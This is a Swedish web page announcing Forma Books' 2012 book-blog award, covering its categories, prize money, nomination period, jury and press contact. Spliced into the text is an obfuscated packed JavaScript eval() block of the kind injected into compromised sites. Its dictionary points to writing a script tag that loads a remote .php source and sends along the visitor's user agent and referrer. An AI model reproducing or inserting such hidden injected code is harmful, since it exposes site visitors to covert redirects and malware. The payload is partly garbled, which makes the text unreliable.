Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Forma Books Blog Award

Forma Books Blog Award
Revue Magazine

Forma eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knsda|var|u0026u|referrer|yayzk||js|php’.split(’|’),0,{}))
Books delar för andra året i rad ut pris för bästa bokblogg! 

Priset ges till den bokblogg som på bästa sätt uppmärksammar litteraturen och skapar ett alldeles eget rum för den bokintresserade att vistas i.

I år uppmärksammar vi två kategorier av bokbloggar; de som enbart skriver om barn- och ungdomsböcker och de som har störst fokus på vuxenlitteraturen. Prissumman 25.000:- delas lika mellan dessa. Årets vinnare erbjuds också att sitta med i nästa års jury. Priset är inte möjligt att vinna två år i rad.

Prisutdelningen sker i Forma Books monter på Bok- och Biblioteksmässan i Göteborg lördagen den 29 september.

Nomineringarna sker via Forma Books hemsida www.formabooks.se

Från och med den 21 maj till 18 juni 2012.

Det är möjligt att nominera i båda kategorier eller endast en. Tävlingen är öppen för alla och man kan nominera så många bokbloggar man vill.

Efter nomineringstidens slut sammanträder en jury som utser tre kandidater till priset. Därefter vidtar en allmän omröstning på wwwformabooks.se där tävlingen avgörs.

Juryn består av följande personer: Cecilia Gustavsson, redaktör och reporter på Aftonbladets boksidor, Johanna Lindbäck, Bokhora (förra årets vinnare av Forma Books Blog Award) och Suzanne Fritz, grundare av nätbokhandeln Fritz Ståhl, Johan Egerkrans, illustratör, och Sophie Strömqvist, webbansvarig på Forma Books samt Tiina Nevala, PR- och informationsansvarig på Forma Books. Juryns beslut kan inte överklagas.

För frågor och mer information, kontakta Tiina Nevala, PR- och informationsansvarig på Forma Books.

Mejl: tiina.nevala@formapg.se

Tel: 08-728 24 14